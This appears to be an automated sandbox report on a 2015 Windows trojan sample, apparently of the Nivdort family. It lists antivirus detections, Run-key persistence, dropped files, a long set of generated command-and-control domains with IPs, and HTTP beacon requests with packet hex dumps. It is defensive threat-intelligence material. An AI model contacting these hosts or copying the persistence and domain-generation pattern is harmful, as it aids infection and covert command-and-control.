Analysis Date: 2015-08-22 22:18:25
MD5: 474f89295c4c6cca4febe9ed3406330b
SHA1: 15117849c4bc9b274c0bec75d8073008bffc593d

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 6393a2ca7f40d7da49793b2b3b63afa9 sha1: 2affc170b3048d560d8f6cb98261984407cd980f size: 301568
Section .rdata md5: fdbdc10731cedd205e3261d146f2e6dc sha1: af16035f1d5838f6db278982e33b4d17afb394ff size: 34816
Section .data md5: 1dcd7e9cc45597ae27082cbbbdca76a1 sha1: ef2bed6df25dd052f1c59a96313050fa6224a248 size: 92160
Timestamp: 2014-10-30 09:50:22
Packer: Microsoft Visual C++ ?.?
PEhash: de54c02fc4d3cbb5b1b7db68bdb854cd1c1be93b
IMPhash: a9c4b80511b4c2bf681e20a5336b8a85
AV CA (E-Trust Ino): Win32/Tnega.XAWY!suspicious
AV F-Secure: Gen:Variant.Symmi.22722
AV Dr. Web: Trojan.DownLoader11.48796
AV ClamAV: no_virus
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV BullGuard: Gen:Variant.Symmi.22722
AV Padvish: no_virus
AV VirusBlokAda (vba32): no_virus
AV CAT (quickheal): Trojan.Dynamer.AC3
AV Trend Micro: TROJ_FORUCON.BMC
AV Kaspersky: Trojan.Win32.Generic
AV Zillya!: no_virus
AV Emsisoft: Gen:Variant.Symmi.22722
AV Ikarus: Trojan.FBAccountLock
AV Frisk (f-prot): no_virus
AV Authentium: W32/Wonton.B.gen!Eldorado
AV MalwareBytes: Trojan.Zbot.WHE
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.BD
AV K7: Trojan ( 004938ec1 )
AV BitDefender: Gen:Variant.Symmi.22722
AV Fortinet: W32/Agent.VNC!tr
AV Symantec: Downloader.Upatre!g15
AV Grisoft (avg): Win32/Cryptor
AV Eset (nod32): Win32/Agent.VNC
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Twister: Trojan.Agent.VNC.aanx.mg
AV Avira (antivir): BDS/Zegost.Gen4
AV Mcafee: Trojan-FEMT!474F89295C4C
AV Rising: no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Encrypting Windows AutoConfig Security ➝ C:\Documents and Settings\Administrator\Application Data\hkscdunlkzdi\twgbiiocs.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\hkscdunlkzdi\twgbiiocs.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\hkscdunlkzdi\twgbiiocs.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\hkscdunlkzdi\twgbiiocs.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\hkscdunlkzdi\bcawahs.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\hkscdunlkzdi\twgbiiocs.jzzh
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\hkscdunlkzdi\twgbiiocs.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\hkscdunlkzdi\twgbiiocs.exe"

Network Details:

DNS crowdcircle.net, Type: A ➝ 50.63.202.49
DNS watercircle.net, Type: A ➝ 202.181.99.36
DNS fightafraid.net, Type: A ➝ 195.22.26.252
DNS fightafraid.net, Type: A ➝ 195.22.26.253
DNS fightafraid.net, Type: A ➝ 195.22.26.254
DNS fightafraid.net, Type: A ➝ 195.22.26.231
DNS partycircle.net, Type: A ➝ 82.150.140.89
DNS melbourneit.hotkeysparking.com, Type: A ➝ 8.5.1.16
DNS gentlemanalways.net, Type: A ➝ 95.211.230.75
DNS summerforest.net, Type: A ➝ 216.214.1.135
DNS wateranger.net, Type: A ➝ 209.221.136.249
DNS membercircle.net, Type: A
DNS beginmeasure.net, Type: A
DNS knownmeasure.net, Type: A
DNS begindinner.net, Type: A
DNS knowndinner.net, Type: A
DNS beginafraid.net, Type: A
DNS knownafraid.net, Type: A
DNS begincircle.net, Type: A
DNS knowncircle.net, Type: A
DNS summermeasure.net, Type: A
DNS crowdmeasure.net, Type: A
DNS summerdinner.net, Type: A
DNS crowddinner.net, Type: A
DNS summerafraid.net, Type: A
DNS crowdafraid.net, Type: A
DNS summercircle.net, Type: A
DNS thoughtmeasure.net, Type: A
DNS watermeasure.net, Type: A
DNS thoughtdinner.net, Type: A
DNS waterdinner.net, Type: A
DNS thoughtafraid.net, Type: A
DNS waterafraid.net, Type: A
DNS thoughtcircle.net, Type: A
DNS womanmeasure.net, Type: A
DNS smokemeasure.net, Type: A
DNS womandinner.net, Type: A
DNS smokedinner.net, Type: A
DNS womanafraid.net, Type: A
DNS smokeafraid.net, Type: A
DNS womancircle.net, Type: A
DNS smokecircle.net, Type: A
DNS partymeasure.net, Type: A
DNS fightmeasure.net, Type: A
DNS partydinner.net, Type: A
DNS fightdinner.net, Type: A
DNS partyafraid.net, Type: A
DNS fightcircle.net, Type: A
DNS freshwheat.net, Type: A
DNS experiencewheat.net, Type: A
DNS freshanger.net, Type: A
DNS experienceanger.net, Type: A
DNS freshalways.net, Type: A
DNS experiencealways.net, Type: A
DNS freshforest.net, Type: A
DNS experienceforest.net, Type: A
DNS gentlemanwheat.net, Type: A
DNS alreadywheat.net, Type: A
DNS gentlemananger.net, Type: A
DNS alreadyanger.net, Type: A
DNS alreadyalways.net, Type: A
DNS gentlemanforest.net, Type: A
DNS alreadyforest.net, Type: A
DNS followwheat.net, Type: A
DNS memberwheat.net, Type: A
DNS followanger.net, Type: A
DNS memberanger.net, Type: A
DNS followalways.net, Type: A
DNS memberalways.net, Type: A
DNS followforest.net, Type: A
DNS memberforest.net, Type: A
DNS beginwheat.net, Type: A
DNS knownwheat.net, Type: A
DNS beginanger.net, Type: A
DNS knownanger.net, Type: A
DNS beginalways.net, Type: A
DNS knownalways.net, Type: A
DNS beginforest.net, Type: A
DNS knownforest.net, Type: A
DNS summerwheat.net, Type: A
DNS crowdwheat.net, Type: A
DNS summeranger.net, Type: A
DNS crowdanger.net, Type: A
DNS summeralways.net, Type: A
DNS crowdalways.net, Type: A
DNS crowdforest.net, Type: A
DNS thoughtwheat.net, Type: A
DNS waterwheat.net, Type: A
DNS thoughtanger.net, Type: A
HTTP GET http://crowdcircle.net/index.php?email=ramoniq_28@yahoo.com&method=post&len
User-Agent:
HTTP GET http://watercircle.net/index.php?email=ramoniq_28@yahoo.com&method=post&len
User-Agent:
HTTP GET http://fightafraid.net/index.php?email=ramoniq_28@yahoo.com&method=post&len
User-Agent:
HTTP GET http://partycircle.net/index.php?email=ramoniq_28@yahoo.com&method=post&len
User-Agent:
HTTP GET http://freshanger.net/index.php?email=ramoniq_28@yahoo.com&method=post&len
User-Agent:
HTTP GET http://gentlemanalways.net/index.php?email=ramoniq_28@yahoo.com&method=post&len
User-Agent:
HTTP GET http://summerforest.net/index.php?email=ramoniq_28@yahoo.com&method=post&len
User-Agent:
HTTP GET http://wateranger.net/index.php?email=ramoniq_28@yahoo.com&method=post&len
User-Agent:
Flows TCP 192.168.1.1:1031 ➝ 50.63.202.49:80
Flows TCP 192.168.1.1:1032 ➝ 202.181.99.36:80
Flows TCP 192.168.1.1:1033 ➝ 195.22.26.252:80
Flows TCP 192.168.1.1:1034 ➝ 82.150.140.89:80
Flows TCP 192.168.1.1:1035 ➝ 8.5.1.16:80
Flows TCP 192.168.1.1:1036 ➝ 95.211.230.75:80
Flows TCP 192.168.1.1:1037 ➝ 216.214.1.135:80
Flows TCP 192.168.1.1:1038 ➝ 209.221.136.249:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d72616d 6f6e6971 5f323840   mail=ramoniq_28@
0x00000020 (00032)   7961686f 6f2e636f 6d266d65 74686f64   yahoo.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206372 6f776463   se..Host: crowdc
0x00000070 (00112)   6972636c 652e6e65 740d0a0d 0a         ircle.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d72616d 6f6e6971 5f323840   mail=ramoniq_28@
0x00000020 (00032)   7961686f 6f2e636f 6d266d65 74686f64   yahoo.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207761 74657263   se..Host: waterc
0x00000070 (00112)   6972636c 652e6e65 740d0a0d 0a         ircle.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d72616d 6f6e6971 5f323840   mail=ramoniq_28@
0x00000020 (00032)   7961686f 6f2e636f 6d266d65 74686f64   yahoo.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206669 67687461   se..Host: fighta
0x00000070 (00112)   66726169 642e6e65 740d0a0d 0a         fraid.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d72616d 6f6e6971 5f323840   mail=ramoniq_28@
0x00000020 (00032)   7961686f 6f2e636f 6d266d65 74686f64   yahoo.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207061 72747963   se..Host: partyc
0x00000070 (00112)   6972636c 652e6e65 740d0a0d 0a         ircle.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d72616d 6f6e6971 5f323840   mail=ramoniq_28@
0x00000020 (00032)   7961686f 6f2e636f 6d266d65 74686f64   yahoo.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206672 65736861   se..Host: fresha
0x00000070 (00112)   6e676572 2e6e6574 0d0a0d0a 0a         nger.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d72616d 6f6e6971 5f323840   mail=ramoniq_28@
0x00000020 (00032)   7961686f 6f2e636f 6d266d65 74686f64   yahoo.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206765 6e746c65   se..Host: gentle
0x00000070 (00112)   6d616e61 6c776179 732e6e65 740d0a0d   manalways.net...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d72616d 6f6e6971 5f323840   mail=ramoniq_28@
0x00000020 (00032)   7961686f 6f2e636f 6d266d65 74686f64   yahoo.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207375 6d6d6572   se..Host: summer
0x00000070 (00112)   666f7265 73742e6e 65740d0a 0d0a0a0d   forest.net......
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d72616d 6f6e6971 5f323840   mail=ramoniq_28@
0x00000020 (00032)   7961686f 6f2e636f 6d266d65 74686f64   yahoo.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207761 74657261   se..Host: watera
0x00000070 (00112)   6e676572 2e6e6574 0d0a0d0a 0d0a0a0d   nger.net........
0x00000080 (00128)   0a                                    .
Strings